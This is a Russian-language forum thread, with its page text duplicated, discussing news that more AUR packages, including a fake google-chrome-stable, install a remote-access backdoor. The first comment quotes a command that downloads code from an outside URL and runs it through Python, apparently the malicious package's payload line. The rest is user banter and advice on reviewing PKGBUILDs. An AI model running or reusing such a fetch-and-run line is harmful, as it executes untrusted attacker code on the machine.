forum.opennet.ru - "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных пакета" (20)

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных пакета"

Форум Разговоры, обсуждение новостей
Вариант для распечатки		Пред. тема \| След. тема
Изначальное сообщение		[ Отслеживать ]

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных пакета"	+/–
Сообщение от opennews (??), 01-Авг-25, 22:35
В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе... Подробнее: https://www.opennet.me/opennews/art.shtml?num=63662
Ответить \| Правка \| Cообщить модератору

Оглавление

LOL , Аноним (1), 22:35 , 01-Авг-25, (1) +1
В AUR-репозитории выявлен безвредный пакет , Аноним (2), 22:36 , 01-Авг-25, (2) +2
Вредоносных программ под Linux всё больше и больше Но правда они чаще всего ата, Аноним (3), 22:49 , 01-Авг-25, (3)

виноват в первую очередь сам пользовательГлавное написать Не ставить ЭТОТ пакет , Аноним (5), 22:52 , 01-Авг-25, (5) +1

Так можно туннели бекдором до SSH кидать и компом чужим управлять , Аноним (5), 22:49 , 01-Авг-25, (4)
И что теперь делать , Аноним (6), 22:58 , 01-Авг-25, (6)

Читать пкгбилды аура перед запуском Правда в мире, где половина инновационного с, Аноним (7), 23:10 , 01-Авг-25, (7) +2
Клонить репы себе на машину, удалять git, проверять PKGBUILD и самому поддержив, НяшМяш (ok), 00:12 , 02-Авг-25, (16)

Arch всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь , zionist (ok), 23:13 , 01-Авг-25, (8) –6

В аур пакеты проверяются сообществом и исходники открыты, что снижает риски А в, Аноним (9), 23:18 , 01-Авг-25, (9)

Снижають, снижають, милок, не боись Новость читал , Аноним (13), 23:34 , 01-Авг-25, (13)

снижают, но не исключают бабуль, ложись спать, Аноним (9), 00:05 , 02-Авг-25, (15) +2

Аур это такой же арч, как ppa дебиан , Аноним (11), 23:31 , 01-Авг-25, (11) +1

Аур лучше, исходники прямо в вебморде можно посмотреть Как там у ппа с отображе, НяшМяш (ok), 00:13 , 02-Авг-25, (17)

Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно AUR, freeperson (?), 23:30 , 01-Авг-25, (10) –2

Гентушникам тоже ухо держать востро в отношении к оверлеям , Аноним (14), 00:04 , 02-Авг-25, (14)

Арч со своим АУР - ненужная помойка Если раньше его можно было использовать для, Beta Version (ok), 23:33 , 01-Авг-25, (12) –3

Габен, гребущий лопатой деньги со стимдеков, сидит понтуется , НяшМяш (ok), 00:14 , 02-Авг-25, (18)
Скрыто модератором, Аноним (19), 00:24 , 02-Авг-25, (19)

AUR удобно использовать как источник готовых инструкций для сборки пакетов котор, Аноним (20), 01:02 , 02-Авг-25, (20)

Сообщения [Сортировка по времени | RSS]

1. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..." +1 +/–

Сообщение от Аноним (1), 01-Авг-25, 22:35

> python -c "$(curl https://segs.lol/9wUb1Z)"
LOL!

Ответить | Правка | Наверх | Cообщить модератору

2. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..." +2 +/–

Сообщение от Аноним (2), 01-Авг-25, 22:36

В AUR-репозитории выявлен безвредный пакет.

Ответить | Правка | Наверх | Cообщить модератору

3. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +/–

Сообщение от Аноним (3), 01-Авг-25, 22:49

Вредоносных программ под Linux всё больше и больше. Но правда они чаще всего атакуют пользователей работают из-под рута.

Ответить | Правка | Наверх | Cообщить модератору

5. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +1 +/–

Сообщение от Аноним (5), 01-Авг-25, 22:52

виноват в первую очередь сам пользователь
Главное написать Не ставить ЭТОТ пакет.. и пользователь поставит.
Ведь всю помойку тянут на ПК.. всю!

Ответить | Правка | Наверх | Cообщить модератору

4. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..." +/–

Сообщение от Аноним (5), 01-Авг-25, 22:49

Так можно туннели бекдором до SSH кидать и компом чужим управлять..

Ответить | Правка | Наверх | Cообщить модератору

6. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +/–

Сообщение от Аноним (6), 01-Авг-25, 22:58

И что теперь делать?

Ответить | Правка | Наверх | Cообщить модератору

7. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +2 +/–

Сообщение от Аноним (7), 01-Авг-25, 23:10

Читать пкгбилды аура перед запуском.
Правда в мире, где половина инновационного софта ставится через curl |sudo sh , будет затруднительно отличить вирус от нормального софта.

Ответить | Правка | Наверх | Cообщить модератору

16. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +/–

Сообщение от НяшМяш (ok), 02-Авг-25, 00:12

Клонить репы себе на машину, удалять .git, проверять PKGBUILD и самому поддерживать. Иногда даже получается проще, потому что меинтейнеры оригинальных пакетов часто слоупочат версии обновлять.

Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

8. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." –6 +/–

Сообщение от zionist (ok), 01-Авг-25, 23:13

Arch всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь серьёзного использования.

Ответить | Правка | Наверх | Cообщить модератору

9. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +/–

Сообщение от Аноним (9), 01-Авг-25, 23:18

В аур пакеты проверяются сообществом и исходники открыты, что снижает риски. А вот что творится в сторонних пользовательских репозиториях других систем, например в PPA у Ubuntu, часто остаётся за кадром-- там тоже может быть что угодно. Разница лишь в прозрачности

Ответить | Правка | Наверх | Cообщить модератору

13. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +/–

Сообщение от Аноним (13), 01-Авг-25, 23:34

>снижает риски
Снижають, снижають, милок, не боись! Новость читал?

Ответить | Правка | Наверх | Cообщить модератору

15. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +2 +/–

Сообщение от Аноним (9), 02-Авг-25, 00:05

снижают, но не исключают. бабуль, ложись спать

Ответить | Правка | Наверх | Cообщить модератору

11. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +1 +/–

Сообщение от Аноним (11), 01-Авг-25, 23:31

Аур это такой же арч, как ppa дебиан.

Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

17. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +/–

Сообщение от НяшМяш (ok), 02-Авг-25, 00:13

Аур лучше, исходники прямо в вебморде можно посмотреть. Как там у ппа с отображением рецепта сборки?

Ответить | Правка | Наверх | Cообщить модератору

10. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." –2 +/–

Сообщение от freeperson (?), 01-Авг-25, 23:30

Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно. AUR это та ещё помойка, где никто не проверяет ничего. Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.

Ответить | Правка | Наверх | Cообщить модератору

14. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +/–

Сообщение от Аноним (14), 02-Авг-25, 00:04

Гентушникам тоже ухо держать востро в отношении к оверлеям.

Ответить | Правка | Наверх | Cообщить модератору

12. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." –3 +/–

Сообщение от Beta Version (ok), 01-Авг-25, 23:33

Арч со своим АУР - ненужная помойка. Если раньше его можно было использовать для понтов, то сегодня он просто не нужен.

Ответить | Правка | Наверх | Cообщить модератору

18. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +/–

Сообщение от НяшМяш (ok), 02-Авг-25, 00:14

Габен, гребущий лопатой деньги со стимдеков, сидит понтуется.

Ответить | Правка | Наверх | Cообщить модератору

19. Скрыто модератором +/–

Сообщение от Аноним (19), 02-Авг-25, 00:24

"Windows со своим store - ненужная помойка. Если раньше можно было использовать для понтов, то сегодня он просто не нужен."
Как бы... Много изменилось... Да...

Ответить | Правка | К родителю #12 | Наверх | Cообщить модератору

20. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..." +/–

Сообщение от Аноним (20), 02-Авг-25, 01:02

AUR удобно использовать как источник готовых инструкций для сборки пакетов которых нет в BLFS.

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

1. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."	+1 +/–
Сообщение от Аноним (1), 01-Авг-25, 22:35
> python -c "$(curl https://segs.lol/9wUb1Z)" LOL!
Ответить \| Правка \| Наверх \| Cообщить модератору

2. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."	+2 +/–
Сообщение от Аноним (2), 01-Авг-25, 22:36
В AUR-репозитории выявлен безвредный пакет.
Ответить \| Правка \| Наверх \| Cообщить модератору

3. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+/–
Сообщение от Аноним (3), 01-Авг-25, 22:49
Вредоносных программ под Linux всё больше и больше. Но правда они чаще всего атакуют пользователей работают из-под рута.
Ответить \| Правка \| Наверх \| Cообщить модератору


	5. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+1 +/–
	Сообщение от Аноним (5), 01-Авг-25, 22:52
	виноват в первую очередь сам пользователь Главное написать Не ставить ЭТОТ пакет.. и пользователь поставит. Ведь всю помойку тянут на ПК.. всю!
	Ответить \| Правка \| Наверх \| Cообщить модератору

4. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."	+/–
Сообщение от Аноним (5), 01-Авг-25, 22:49
Так можно туннели бекдором до SSH кидать и компом чужим управлять..
Ответить \| Правка \| Наверх \| Cообщить модератору

6. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+/–
Сообщение от Аноним (6), 01-Авг-25, 22:58
И что теперь делать?
Ответить \| Правка \| Наверх \| Cообщить модератору


	7. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+2 +/–
	Сообщение от Аноним (7), 01-Авг-25, 23:10
	Читать пкгбилды аура перед запуском. Правда в мире, где половина инновационного софта ставится через curl \|sudo sh , будет затруднительно отличить вирус от нормального софта.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	16. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+/–
	Сообщение от НяшМяш (ok), 02-Авг-25, 00:12
	Клонить репы себе на машину, удалять .git, проверять PKGBUILD и самому поддерживать. Иногда даже получается проще, потому что меинтейнеры оригинальных пакетов часто слоупочат версии обновлять.
	Ответить \| Правка \| К родителю #6 \| Наверх \| Cообщить модератору

8. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	–6 +/–
Сообщение от zionist (ok), 01-Авг-25, 23:13
Arch всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь серьёзного использования.
Ответить \| Правка \| Наверх \| Cообщить модератору


	9. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+/–
	Сообщение от Аноним (9), 01-Авг-25, 23:18
	В аур пакеты проверяются сообществом и исходники открыты, что снижает риски. А вот что творится в сторонних пользовательских репозиториях других систем, например в PPA у Ubuntu, часто остаётся за кадром-- там тоже может быть что угодно. Разница лишь в прозрачности
	Ответить \| Правка \| Наверх \| Cообщить модератору


	13. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+/–
	Сообщение от Аноним (13), 01-Авг-25, 23:34
	>снижает риски Снижають, снижають, милок, не боись! Новость читал?
	Ответить \| Правка \| Наверх \| Cообщить модератору


	15. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+2 +/–
	Сообщение от Аноним (9), 02-Авг-25, 00:05
	снижают, но не исключают. бабуль, ложись спать
	Ответить \| Правка \| Наверх \| Cообщить модератору


	11. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+1 +/–
	Сообщение от Аноним (11), 01-Авг-25, 23:31
	Аур это такой же арч, как ppa дебиан.
	Ответить \| Правка \| К родителю #8 \| Наверх \| Cообщить модератору


	17. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+/–
	Сообщение от НяшМяш (ok), 02-Авг-25, 00:13
	Аур лучше, исходники прямо в вебморде можно посмотреть. Как там у ппа с отображением рецепта сборки?
	Ответить \| Правка \| Наверх \| Cообщить модератору

10. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	–2 +/–
Сообщение от freeperson (?), 01-Авг-25, 23:30
Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно. AUR это та ещё помойка, где никто не проверяет ничего. Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.
Ответить \| Правка \| Наверх \| Cообщить модератору


	14. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+/–
	Сообщение от Аноним (14), 02-Авг-25, 00:04
	Гентушникам тоже ухо держать востро в отношении к оверлеям.
	Ответить \| Правка \| Наверх \| Cообщить модератору

12. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	–3 +/–
Сообщение от Beta Version (ok), 01-Авг-25, 23:33
Арч со своим АУР - ненужная помойка. Если раньше его можно было использовать для понтов, то сегодня он просто не нужен.
Ответить \| Правка \| Наверх \| Cообщить модератору


	18. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+/–
	Сообщение от НяшМяш (ok), 02-Авг-25, 00:14
	Габен, гребущий лопатой деньги со стимдеков, сидит понтуется.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	19. Скрыто модератором	+/–
	Сообщение от Аноним (19), 02-Авг-25, 00:24
	"Windows со своим store - ненужная помойка. Если раньше можно было использовать для понтов, то сегодня он просто не нужен." Как бы... Много изменилось... Да...
	Ответить \| Правка \| К родителю #12 \| Наверх \| Cообщить модератору

20. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."	+/–
Сообщение от Аноним (20), 02-Авг-25, 01:02
AUR удобно использовать как источник готовых инструкций для сборки пакетов которых нет в BLFS.
Ответить \| Правка \| Наверх \| Cообщить модератору